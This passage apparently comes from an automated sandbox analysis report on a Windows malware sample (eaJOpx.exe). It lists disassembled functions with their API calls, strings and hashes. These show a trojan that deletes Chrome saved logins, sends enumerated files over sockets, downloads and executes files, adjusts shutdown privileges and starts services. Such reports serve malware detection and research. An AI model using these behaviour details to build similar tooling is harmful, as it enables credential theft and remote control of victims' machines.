                                                    • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                                                    • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                    • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                                                    Function 0044801F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 171timeCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                    • _free.LIBCMT ref: 00448077
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • _free.LIBCMT ref: 00448243
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                    • String ID: Zb1Y/
                                                    • API String ID: 1286116820-3232713500
                                                    • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                    • Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
                                                    • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                    • Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58
                                                    Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                      • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                      • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                    • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                    • ExitProcess.KERNEL32 ref: 0040E672
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                                    • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                    • API String ID: 2281282204-3981147832
                                                    • Opcode ID: 1dce73582a56813ea3a1ce107ce94d35fff761879845704e5d0d90b6e5a69bf5
                                                    • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                                    • Opcode Fuzzy Hash: 1dce73582a56813ea3a1ce107ce94d35fff761879845704e5d0d90b6e5a69bf5
                                                    • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                                                    Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                    • GetLastError.KERNEL32 ref: 0040B261
                                                    Strings
                                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                    • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                    • UserProfile, xrefs: 0040B227
                                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteErrorFileLast
                                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                    • API String ID: 2018770650-1062637481
                                                    • Opcode ID: d28def7c9280aa2a9c215b56ee10fe1cde150d05b3267e349477c4c7a3166050
                                                    • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                                    • Opcode Fuzzy Hash: d28def7c9280aa2a9c215b56ee10fe1cde150d05b3267e349477c4c7a3166050
                                                    • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                                    Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                    • GetLastError.KERNEL32 ref: 00416B02
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                    • String ID: SeShutdownPrivilege
                                                    • API String ID: 3534403312-3733053543
                                                    • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                    • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                    • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                    • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                    Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 004089AE
                                                      • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                      • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                      • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                      • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                      • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B90,?,?,00000000,00475B90,004017F3), ref: 004047FD
                                                      • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404808
                                                      • Part of subcall function 004047EB: CloseHandle.KERNELBASE(?,?,?,00000000,00475B90,004017F3), ref: 00404811
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                    • String ID:
                                                    • API String ID: 4043647387-0
                                                    • Opcode ID: a7e51efc752b031afc58cf73032587facd122f1466f4da27dadf7484b984f89b
                                                    • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                                    • Opcode Fuzzy Hash: a7e51efc752b031afc58cf73032587facd122f1466f4da27dadf7484b984f89b
                                                    • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                                    Function 00419BD4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                                    • String ID:
                                                    • API String ID: 276877138-0
                                                    • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                    • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                    • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                    • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                    Function 00418C79 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Find$CreateFirstNext
                                                    • String ID: @CG$XCG$>G
                                                    • API String ID: 341183262-3030817687
                                                    • Opcode ID: 31d89068bf95987aa1d708424f7af8f01dfdc6c5c004a65f310861421951643d
                                                    • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                    • Opcode Fuzzy Hash: 31d89068bf95987aa1d708424f7af8f01dfdc6c5c004a65f310861421951643d
                                                    • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                    Function 00450A8F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                                                    • _wcschr.LIBVCRUNTIME ref: 00450C01
                                                    • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                    • String ID: Zb1Y/
                                                    • API String ID: 4212172061-3232713500
                                                    • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                    • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                                    • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                    • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                                    Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                      • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                      • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                      • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                      • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                    • String ID: PowrProf.dll$SetSuspendState
                                                    • API String ID: 1589313981-1420736420
                                                    • Opcode ID: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                    • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                                    • Opcode Fuzzy Hash: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                    • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                                    Function 004511F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                                                    • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: ACP$OCP
                                                    • API String ID: 2299586839-711371036
                                                    • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                    • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                                    • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                    • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                                    Function 0041A64F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                                    • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                                    • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                                    • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID: SETTINGS
                                                    • API String ID: 3473537107-594951305
                                                    • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                    • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                                    • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                    • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                                    Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00407A91
                                                    • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstH_prologNext
                                                    • String ID:
                                                    • API String ID: 1157919129-0
                                                    • Opcode ID: 61484ff0a18bbbac8a51a5396f02c1862ca96db695df72985f64448775d16896
                                                    • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                                    • Opcode Fuzzy Hash: 61484ff0a18bbbac8a51a5396f02c1862ca96db695df72985f64448775d16896
                                                    • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                                                    Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DownloadExecuteFileShell
                                                    • String ID: C:\Users\user\AppData\Roaming\eaJOpx.exe$open
                                                    • API String ID: 2825088817-4151513542
                                                    • Opcode ID: 7e85e9708a69cc66c26a7a88b77871784f210427ffc5903fb5556e7e05261e37
                                                    • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                                    • Opcode Fuzzy Hash: 7e85e9708a69cc66c26a7a88b77871784f210427ffc5903fb5556e7e05261e37
                                                    • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                                    Function 00450E7A Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                                    • String ID: Zb1Y/
                                                    • API String ID: 2829624132-3232713500
                                                    • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                    • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                                    • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                    • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                                    Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileFind$FirstNextsend
                                                    • String ID: x@G$x@G
                                                    • API String ID: 4113138495-3390264752
                                                    • Opcode ID: 0289bfe1971c588a6e1e7db017a286e895e6150be38c6e727895ab5dcaa3e2db
                                                    • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                                    • Opcode Fuzzy Hash: 0289bfe1971c588a6e1e7db017a286e895e6150be38c6e727895ab5dcaa3e2db
                                                    • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                    Function 0041BB87 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                      • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                      • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                      • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateInfoParametersSystemValue
                                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                    • API String ID: 4127273184-3576401099
                                                    • Opcode ID: 2bffa28fade511f5357cc31b36866154740c52a347c2bc5d983fcb8ea3edd996
                                                    • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                                    • Opcode Fuzzy Hash: 2bffa28fade511f5357cc31b36866154740c52a347c2bc5d983fcb8ea3edd996
                                                    • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                                    Function 0043A66D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A765
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A76F
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A77C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID: Zb1Y/
                                                    • API String ID: 3906539128-3232713500
                                                    • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                    • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                                    • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                    • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                                    Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00408DAC
                                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileFind$FirstH_prologNext
                                                    • String ID:
                                                    • API String ID: 301083792-0
                                                    • Opcode ID: de076679f85755db87780a347033046bf4357413a6f37d78cf41cd7617215d73
                                                    • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                                    • Opcode Fuzzy Hash: de076679f85755db87780a347033046bf4357413a6f37d78cf41cd7617215d73
